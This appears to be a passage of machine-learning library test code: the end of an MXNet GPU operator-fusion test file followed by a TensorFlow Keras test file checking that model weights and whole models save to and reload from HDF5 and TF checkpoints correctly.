np.testing.assert_allclose(orig.asnumpy(), fused.asnumpy(), rtol=rtol[dtype], atol=atol[dtype])
def check_unary_ops():
unary_ops = [
'relu',
'sigmoid',
'softsign',
'exp',
'expm1',
'log',
'log10',
'log2',
'log1p',
'degrees',
'radians',
'sin',
'cos',
'tan',
'arcsin',
'arccos',
'arctan',
'sinh',
'cosh',
'tanh',
'arcsinh',
'arctanh',
'sqrt',
'rsqrt',
'cbrt',
'rcbrt',
'square',
'squeeze',
'zeros_like',
'ones_like',
'flatten',
'round',
'rint',
'fix',
'floor',
'ceil',
'trunc',
'sign',
'reciprocal',
'abs',
'gamma',
'gammaln',
'erf',
'negative',
'logical_not',
]
def announce_check(op_name):
print("Checking fusion of " + op_name)
arr = mx.random.uniform(shape=rand_shape_2d())
a = mx.sym.Variable('a')
for op_name in unary_ops:
announce_check(op_name)
op = getattr(mx.sym, op_name)
sym = op(a)
check_fused_symbol(sym, a=arr)
# unary ops requiring special treatment
# arccosh needs input to be >= 1
arr2 = arr + 1
announce_check('arccosh')
check_fused_symbol(mx.sym.arccosh(a), a=arr2)
# erfinv needs -1 < input < 1, but we avoid the limits of this range where the slope nears +inf.
arr2 = (arr - 0.5) * 1.99
announce_check('erfinv')
check_fused_symbol(mx.sym.erfinv(a), a=arr2)
# Activation requires act_type attribute
for act_type in ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']:
announce_check("Activation(act_type='{}')".format(act_type))
check_fused_symbol(mx.sym.Activation(a, act_type=act_type), a=arr)
if act_type == 'softrelu':
# Check that softrelu implementation doesn't overflow on large inputs
check_fused_symbol(mx.sym.Activation(a, act_type=act_type), a=1000 * arr)
# Cast requires dtype
for dtype in ['float16', 'float32', 'float64', 'int32']:
announce_check("Cast(dtype='{}')".format(dtype))
check_fused_symbol(mx.sym.Cast(a, dtype=dtype), a=arr)
# reshape requires shape
announce_check('reshape')
check_fused_symbol(mx.sym.reshape(a, shape=(-1,)), a=arr)
# expand_dims requires axis
announce_check('expand_dims')
check_fused_symbol(mx.sym.expand_dims(a, axis=1), a=arr)
# clip requires a_min, a_max
announce_check('clip')
check_fused_symbol(mx.sym.clip(a, a_min=0.3, a_max=0.7), a=arr)
check_fused_symbol(mx.sym.clip(a, a_min=-np.inf, a_max=0.7), a=arr)
check_fused_symbol(mx.sym.clip(a, a_min=-np.inf, a_max=np.inf), a=arr)
check_fused_symbol(mx.sym.clip(a, a_min=0, a_max=np.nan), a=arr)
# smooth_l1 requires a scalar
announce_check('smooth_l1')
check_fused_symbol(mx.sym.smooth_l1(a, scalar=0.3), a=arr)
def check_binary_ops():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
shape = rand_shape_2d()
arr1 = mx.random.uniform(shape=shape)
arr2 = mx.random.uniform(shape=shape)
check_fused_symbol(a+b, a=arr1, b=arr2)
check_fused_symbol(a+3, a=arr1)
check_fused_symbol(a-b, a=arr1, b=arr2)
check_fused_symbol(a-3, a=arr1)
check_fused_symbol(3-a, a=arr1)
check_fused_symbol(a*b, a=arr1, b=arr2)
check_fused_symbol(a*3, a=arr1)
check_fused_symbol(a/(b+1), a=arr1, b=arr2)
check_fused_symbol(a/3, a=arr1)
check_fused_symbol(3/a, a=arr1)
check_fused_symbol(a**b, a=arr1, b=arr2)
check_fused_symbol(a**3, a=arr1)
check_fused_symbol(mx.sym.pow(3,a), a=arr1)
check_fused_symbol(mx.sym.maximum(a,b), a=arr1, b=arr2)
check_fused_symbol(mx.sym.minimum(a,b), a=arr1, b=arr2)
check_fused_symbol(mx.sym.hypot(a,b), a=arr1, b=arr2)
check_fused_symbol(mx.sym.hypot(a,3), a=arr1)
def check_other_ops():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = mx.sym.Variable('c')
shape = rand_shape_2d()
shape = list((5,) + shape)
    # Make sure there are at least 2 elements for the test with negative indices
shape[1] += 1
shape[2] += 1
arr1 = mx.random.uniform(shape=shape)
arr2 = mx.random.uniform(shape=shape)
arr3 = mx.random.uniform(shape=shape)
check_fused_symbol(mx.sym.add_n(a,b,c), a=arr1, b=arr2, c=arr3)
check_fused_symbol(mx.sym.slice_axis(a, axis=0, begin=1, end=4), a=arr1)
# Testing handling of negative axis
check_fused_symbol(mx.sym.slice_axis(a, axis=-3, begin=1, end=4), a=arr1)
begin = (random.randint(0, shape[0]-1),
random.randint(0, shape[1]-1),
random.randint(0, shape[2]-1))
end = (random.randint(begin[0]+1, shape[0]),
random.randint(begin[1]+1, shape[1]),
random.randint(begin[2]+1, shape[2]))
check_fused_symbol(mx.sym.slice(a, begin=begin, end=end), a=arr1)
begin = (random.randint(-shape[0], -2),
random.randint(-shape[1], -2),
random.randint(-shape[2], -2))
end = (random.randint(begin[0]+1, -1),
random.randint(begin[1]+1, -1),
random.randint(begin[2]+1, -1))
check_fused_symbol(mx.sym.slice(a, begin=begin, end=end), a=arr1)
arr1 = mx.random.uniform(shape=(2,3,4,5))
arr2 = mx.random.uniform(shape=(1,2,3))
check_fused_symbol(mx.sym.slice_like(a,b, axes=[-2, 0]), a=arr1, b=arr2)
arr1 = mx.random.uniform(shape=(1,1,2,3))
arr2 = mx.random.uniform(shape=(2,2,2,3))
check_fused_symbol(mx.sym.broadcast_like(a, b, lhs_axes=[0], rhs_axes=[0]), a=arr1, b=arr2)
def check_leakyrelu_ops():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
shape = rand_shape_2d()
arr1 = mx.random.uniform(shape=shape)
arr2 = mx.random.uniform(shape=shape)
# Testing gelu
print("Checking fusion of LeakyReLU:gelu")
check_fused_symbol(mx.sym.LeakyReLU(a+b, act_type='gelu'), a=arr1, b=arr2)
@with_seed()
def test_fusion():
check_unary_ops()
check_binary_ops()
check_other_ops()
check_leakyrelu_ops()
@with_seed()
def test_fusion_compiler_cache():
# Stresses the internal cache of CUfunctions by creating the same kernel multiple times and
# on multiple GPUs if available.
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
shape = rand_shape_2d()
arr1 = mx.random.uniform(shape=shape)
arr2 = mx.random.uniform(shape=shape)
# Invoke the same model twice, second time will exercise compile cache
check_fused_symbol(a+b, ctx=mx.gpu(0), a=arr1, b=arr2)
check_fused_symbol(a+b, ctx=mx.gpu(0), a=arr1, b=arr2)
# On multi-GPU systems, invoke the same model on other GPUs
num_gpus = mx.context.num_gpus()
if num_gpus > 1:
check_fused_symbol(a+b, ctx=mx.gpu(1), a=arr1, b=arr2)
@with_seed()
@use_np
def test_fusion_boolean_inputs():
from mxnet.gluon import HybridBlock
class Foo(HybridBlock):
def __init__(self):
super(Foo, self).__init__()
def hybrid_forward(self, F, valid_length):
mask = valid_length.astype(np.float32)
mask2 = valid_length.astype(np.float32)
mask = mask * F.np.expand_dims(mask2, axis=-1)
return mask
foo = Foo()
foo.hybridize(static_alloc=True)
out = foo(mx.np.ones((10,), ctx=mx.gpu(), dtype=np.bool))
mx.npx.waitall()
@with_seed()
def test_fusion_different_dimensions():
from mxnet.gluon import HybridBlock
class Foo(HybridBlock):
def __init__(self):
super(Foo, self).__init__()
def hybrid_forward(self, F, x):
mask2 = x.astype(np.float32)
mask = F.expand_dims(mask2, axis=-1)
return mask
foo = Foo()
foo.hybridize(static_alloc=True)
# Pass 1-D data
out = foo(mx.nd.ones((10,), ctx=mx.gpu()))
assert np.all(out.asnumpy() == np.ones((10,1)))
assert out.shape == (10,1)
# Pass 2-D data
out = foo(mx.nd.ones((10,10), ctx=mx.gpu()))
assert np.all(out.asnumpy() == np.ones((10,10)))
assert out.shape == (10,10,1)
@with_seed()
def test_input_reorder():
class Block(gluon.HybridBlock):
def __init__(self, **kwargs):
super(Block, self).__init__(**kwargs)
def hybrid_forward(self, F, x, y, z):
s = x * 2
s2 = s + z
s = F.broadcast_add(s, y * y)
return F.dot(s, s2)
for static_alloc in (False, True):
arg_shapes = [(10, 10), (10, 1), (10, 10)]
arg_data = [mx.random.uniform(shape=s) for s in arg_shapes]
arrays = {}
for use_fusion in ('0', '1'):
with environment('MXNET_USE_FUSION', use_fusion):
arrays[use_fusion] = {}
n = Block()
n.hybridize(static_alloc=static_alloc)
args = [arg.copyto(mx.gpu()) for arg in arg_data]
for arg in args:
arg.attach_grad()
with autograd.record():
r = n(*args)
arrays[use_fusion]['result'] = r
r.backward()
for i, arg in enumerate(args):
arrays[use_fusion][i] = arg.grad
for key in ['result'] + list(range(len(arg_data))):
assert_allclose(arrays['0'][key].asnumpy(), arrays['1'][key].asnumpy())
@with_seed()
def test_fusion_cycle():
class Test(gluon.nn.HybridBlock):
def __init__(self, **kwargs):
super(Test, self).__init__(**kwargs)
def hybrid_forward(self, F, x, y):
x = F.relu(x)
y = F.relu(y)
z1 = F.expand_dims(F.sum_axis(x, axis=1), axis=1)
z2 = F.expand_dims(F.sum_axis(y, axis=1), axis=1)
return x + z2, y + z1
t = Test()
a = mx.nd.zeros(shape=(10,1), ctx=mx.gpu())
b = mx.nd.zeros(shape=(10,1), ctx=mx.gpu())
t.hybridize(static_alloc=True, static_shape=True)
out = t(a, b)
mx.nd.waitall()
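# A minimal, self-contained sketch of the fusion on/off comparison that
# check_fused_symbol() automates above. Illustrative only (not collected by the
# test runner); assumes a CUDA build of MXNet with at least one visible GPU.
def _fusion_comparison_sketch():
    a = mx.sym.Variable('a')
    sym = mx.sym.Group([mx.sym.identity(mx.sym.identity(mx.sym.exp(a)))])
    data = {'a': mx.random.uniform(shape=(3, 4))}
    outputs = {}
    for use_fusion in ('0', '1'):
        with environment('MXNET_USE_FUSION', use_fusion):
            ex = sym._simple_bind(ctx=mx.gpu(0), a=data['a'].shape)
            outputs[use_fusion] = ex.forward(is_train=True, **data)[0].asnumpy()
    # The fused and unfused executors should agree to within float32 tolerance.
    np.testing.assert_allclose(outputs['0'], outputs['1'], rtol=1e-6, atol=1e-7)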
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for model saving."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import tempfile
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.keras.engine import training
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
from tensorflow.python.training import training as training_module
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestWeightSavingAndLoading(test.TestCase, parameterized.TestCase):
def test_weight_loading(self):
with self.test_session():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
model = keras.models.Model(a, b)
x = np.random.random((3, 2))
ref_y = model.predict(x)
weights = model.get_weights()
model.set_weights(weights)
y = model.predict(x)
self.assertAllClose(ref_y, y)
with self.assertRaises(ValueError):
model.set_weights(weights[1:])
with self.assertRaises(ValueError):
model.set_weights(weights[::-1])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
no_extension_path = os.path.join(temp_dir, 'test')
model.save_weights(no_extension_path, save_format='tf')
model.load_weights(no_extension_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
if h5py is None:
return # Skip rest of test if H5py isn't available.
h5_path = os.path.join(temp_dir, 'test.h5')
model.save_weights(h5_path)
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
model.load_weights(h5_path, by_name=True)
y = model.predict(x)
self.assertAllClose(ref_y, y)
model.save_weights(no_extension_path, save_format='hdf5')
model.load_weights(no_extension_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
def test_weight_preprocessing(self):
input_dim = 3
output_dim = 3
size = 2
cases = [
[
(keras.layers.Bidirectional(keras.layers.SimpleRNN(2))),
[np.random.random((2, 1)), np.random.random((2, 1))],
(None, 3, 2),
],
[
(keras.layers.TimeDistributed(keras.layers.Dense(1))),
[np.random.random((2, 1)), np.random.random((1,))],
(None, 3, 2),
],
[
(keras.layers.Conv1D(output_dim, size, use_bias=False)),
[np.random.random((output_dim, input_dim, size, 1))],
(None, 4, input_dim),
],
[
(keras.layers.Conv2D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_last')),
[np.random.random((size, size, input_dim, output_dim))],
(None, 4, 4, input_dim),
],
[
(keras.layers.Conv3D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size, size))],
(None, input_dim, 4, 4, 4),
],
[
(keras.layers.GRU(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
[
(keras.layers.LSTM(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
]
for layer, weights, input_shape in cases:
layer.build(input_shape)
_ = keras.engine.saving.preprocess_weights_for_loading(
layer, weights, original_keras_version='1')
model = keras.models.Sequential([keras.layers.Dense(2, input_dim=2)])
_ = keras.engine.saving.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
x = keras.Input((2,))
y = keras.layers.Dense(2)(x)
model = keras.models.Model(x, y)
_ = keras.engine.saving.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
@parameterized.named_parameters(
('gru', keras.layers.GRU, {
'units': 2,
'input_shape': (3, 5)
}),
('gru_with_reset_after', keras.layers.GRU, {
'units': 2,
'input_shape': (3, 5),
'reset_after': True
}),
('lstm', keras.layers.LSTM, {
'units': 2,
'input_shape': (3, 5)
}),
('cudnngru', keras.layers.CuDNNGRU, {
'units': 2,
'input_shape': (3, 5)
}),
('cudnnlstm', keras.layers.CuDNNLSTM, {
'units': 2,
'input_shape': (3, 5)
}))
def test_preprocess_weights_for_loading_rnn_should_be_idempotent(
self, layer_class, layer_args):
with self.test_session():
layer = layer_class(**layer_args)
layer.build(input_shape=layer_args.get('input_shape'))
weights1 = layer.get_weights()
weights2 = keras.engine.saving.preprocess_weights_for_loading(
layer, weights1)
_ = [
self.assertAllClose(x, y, rtol=1e-05)
for (x, y) in zip(weights1, weights2)
]
def test_sequential_weight_loading(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
batch_size = 5
num_classes = 2
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
x = np.random.random((batch_size, input_dim))
ref_y = model.predict(x)
model.save_weights(h5_path)
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(y, ref_y)
class TestWholeModelSaving(test.TestCase):
def test_sequential_model_saving(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
new_model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# test that new updates are the same with both models
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
new_model.train_on_batch(x, y)
out = model.predict(x)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_sequential_model_saving_without_compile(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
x = np.random.random((1, 3))
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
# Save the model without any compilation or training.
keras.models.save_model(model, fname)
new_model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_sequential_model_saving_2(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
# test with custom optimizer, loss
class CustomOp(keras.optimizers.RMSprop):
pass
def custom_loss(y_true, y_pred):
return keras.losses.mse(y_true, y_pred)
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss=custom_loss, optimizer=CustomOp(), metrics=['acc'])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(
fname,
custom_objects={'CustomOp': CustomOp,
'custom_loss': custom_loss})
os.close(fd)
os.remove(fname)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_functional_model_saving(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
inputs = keras.layers.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
output = keras.layers.Dense(3)(x)
model = keras.models.Model(inputs, output)
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_saving_without_compilation(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_with_tf_optimizer(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse',
optimizer=training_module.AdadeltaOptimizer(0.1),
metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_right_after_compilation(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
model._make_train_function()
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_lambda_numpy_array_arguments(self):
with self.test_session():
if h5py is None:
self.skipTest('h5py required to run this test')
mean = np.random.random((4, 2, 3))
std = np.abs(np.random.random((4, 2, 3))) + 1e-5
inputs = keras.layers.Input(shape=(4, 2, 3))
output = keras.layers.Lambda(lambda image, mu, std: (image - mu) / std,
arguments={'mu': mean, 'std': std})(inputs)
model = keras.models.Model(inputs, output)
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
self.assertAllClose(mean, model.layers[1].arguments['mu'])
self.assertAllClose(std, model.layers[1].arguments['std'])
def test_saving_model_with_long_layer_names(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
      # This layer name will make the `layer_names` HDF5 attribute blow
# out of proportion. Note that it fits into the internal HDF5
# attribute memory limit on its own but because h5py converts
      # the list of layer names into a numpy array, which uses the same
      # amount of memory for every item, it increases the memory
# requirements substantially.
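      # (Keras' HDF5 saving is assumed here to split such an oversized
      # attribute list across numbered attributes, e.g. 'layer_names0',
      # 'layer_names1', ..., which is what the startswith('layer_names')
      # count below looks for.)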
x = keras.Input(shape=(2,), name='input_' + ('x' * (2**15)))
f = x
for i in range(4):
f = keras.layers.Dense(2, name='dense_%d' % (i,))(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
      # Check that the HDF5 file contains a chunked array
      # of layer names.
with h5py.File(fname, 'r') as h5file:
num_names_arrays = len([attr for attr in h5file['model_weights'].attrs
if attr.startswith('layer_names')])
      # The chunking of the layer names array should have happened.
self.assertGreater(num_names_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
def test_saving_model_with_long_weights_names(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
x = keras.Input(shape=(2,), name='nested_model_input')
f = x
for i in range(4):
f = keras.layers.Dense(2, name='nested_model_dense_%d' % (i,))(f)
      # This layer name will make the `weight_names`
# HDF5 attribute blow out of proportion.
f = keras.layers.Dense(2, name='nested_model_output' + ('x' * (2**14)))(f)
nested_model = keras.Model(inputs=[x], outputs=[f], name='nested_model')
x = keras.Input(shape=(2,), name='outer_model_input')
f = nested_model(x)
f = keras.layers.Dense(2, name='outer_model_output')(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
      # Check that the HDF5 file contains a chunked array
      # of weight names.
with h5py.File(fname, 'r') as h5file:
num_weight_arrays = len(
[attr for attr in h5file['model_weights']['nested_model'].attrs
if attr.startswith('weight_names')])
      # The chunking of the weight names array should have happened.
self.assertGreater(num_weight_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
def test_model_saving_to_pre_created_h5py_file(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
inputs = keras.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
outputs = keras.layers.Dense(3)(x)
model = keras.Model(inputs, outputs)
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.Adam(),
metrics=[keras.metrics.categorical_accuracy])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
with h5py.File(fname, mode='r+') as h5file:
keras.models.save_model(model, h5file)
loaded_model = keras.models.load_model(h5file)
out2 = loaded_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Test non-default options in h5
with h5py.File('_', driver='core',
backing_store=False) as h5file:
keras.models.save_model(model, h5file)
loaded_model = keras.models.load_model(h5file)
out2 = loaded_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
class SubclassedModel(training.Model):
def __init__(self):
super(SubclassedModel, self).__init__()
self.x_layer = keras.layers.Dense(3)
self.b_layer = keras.layers.Dense(1)
def call(self, a):
return self.b_layer(self.x_layer(a))
class TestWeightSavingAndLoadingTFFormat(test.TestCase):
@test_util.run_in_graph_and_eager_modes
def test_tensorflow_format_overwrite(self):
with self.test_session() as session:
model = SubclassedModel()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
model(x) # pylint: disable=not-callable
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
model.save_weights(prefix, save_format='tensorflow')
model.save_weights(prefix, save_format='tensorflow', overwrite=True)
with self.assertRaises(EOFError):
# Indirectly tests that the user is prompted
model.save_weights(prefix, save_format='tensorflow', overwrite=False)
def test_no_default_session(self):
with ops.Graph().as_default():
self.assertFalse(ops.get_default_session())
data = np.random.random((1000, 32)).astype(np.float32)
labels = np.random.random((1000, 10)).astype(np.float32)
model = keras.models.Sequential([
keras.layers.Dense(10, activation='softmax'),
keras.layers.Dense(10, activation='softmax')])
model.compile(optimizer=training_module.RMSPropOptimizer(0.001),
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels)
fname = os.path.join(self.get_temp_dir(), 'weights', 'ckpt')
model.save_weights(fname)
model.load_weights(fname)
def test_no_graph_pollution(self):
with context.graph_mode():
graph = ops.Graph()
with graph.as_default(), self.test_session(graph) as session:
model = SubclassedModel()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
model(x) # pylint: disable=not-callable
session.run([v.initializer for v in model.variables])
model.save_weights(prefix, save_format='tensorflow')
op_count = len(graph.get_operations())
model.save_weights(prefix, save_format='tensorflow')
self.assertEqual(len(graph.get_operations()), op_count)
model.load_weights(prefix)
op_count = len(graph.get_operations())
model.load_weights(prefix)
self.assertEqual(len(graph.get_operations()), op_count)
def _weight_loading_test_template(self, make_model_fn):
with self.test_session() as session:
model = make_model_fn()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
ref_y_tensor = model(x)
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
ref_y = self.evaluate(ref_y_tensor)
model.save_weights(prefix, save_format='tf')
for v in model.variables:
self.evaluate(
v.assign(random_ops.random_normal(shape=array_ops.shape(v))))
self.addCleanup(shutil.rmtree, temp_dir)
model.load_weights(prefix)
y = self.evaluate(model(x))
self.assertAllClose(ref_y, y)
# Test restore-on-create if this is a subclassed Model (graph Networks
# will have already created their variables).
load_model = make_model_fn()
load_model.load_weights(prefix)
restore_on_create_y_tensor = load_model(x)
restore_on_create_y = self.evaluate(restore_on_create_y_tensor)
self.assertAllClose(ref_y, restore_on_create_y)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model(self):
def _make_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
return keras.models.Model(a, b)
self._weight_loading_test_template(_make_graph_model)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_subclassed_model(self):
self._weight_loading_test_template(SubclassedModel)
def _new_layer_weight_loading_test_template(
self, first_model_fn, second_model_fn, restore_init_fn):
with self.test_session() as session:
model = first_model_fn()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
ref_y_tensor = model(x)
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
ref_y = self.evaluate(ref_y_tensor)
model.save_weights(prefix)
for v in model.variables:
self.evaluate(
v.assign(random_ops.random_normal(shape=array_ops.shape(v))))
self.addCleanup(shutil.rmtree, temp_dir)
second_model = second_model_fn()
second_model.load_weights(prefix)
second_model(x)
self.evaluate(restore_init_fn(second_model))
second_model.save_weights(prefix)
# Check that the second model's checkpoint loads into the original model
model.load_weights(prefix)
y = self.evaluate(model(x))
self.assertAllClose(ref_y, y)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model_added_layer(self):
def _save_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
return keras.models.Model(a, b)
def _restore_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
y = keras.layers.Dense(1, name='second')(x)
b = keras.layers.Dense(3, name='secondjr')(y)
return keras.models.Model(a, b)
def _restore_init_fn(restore_model):
return [v.initializer for v in restore_model.layers[-1].variables]
self._new_layer_weight_loading_test_template(
_save_graph_model, _restore_graph_model,
_restore_init_fn)
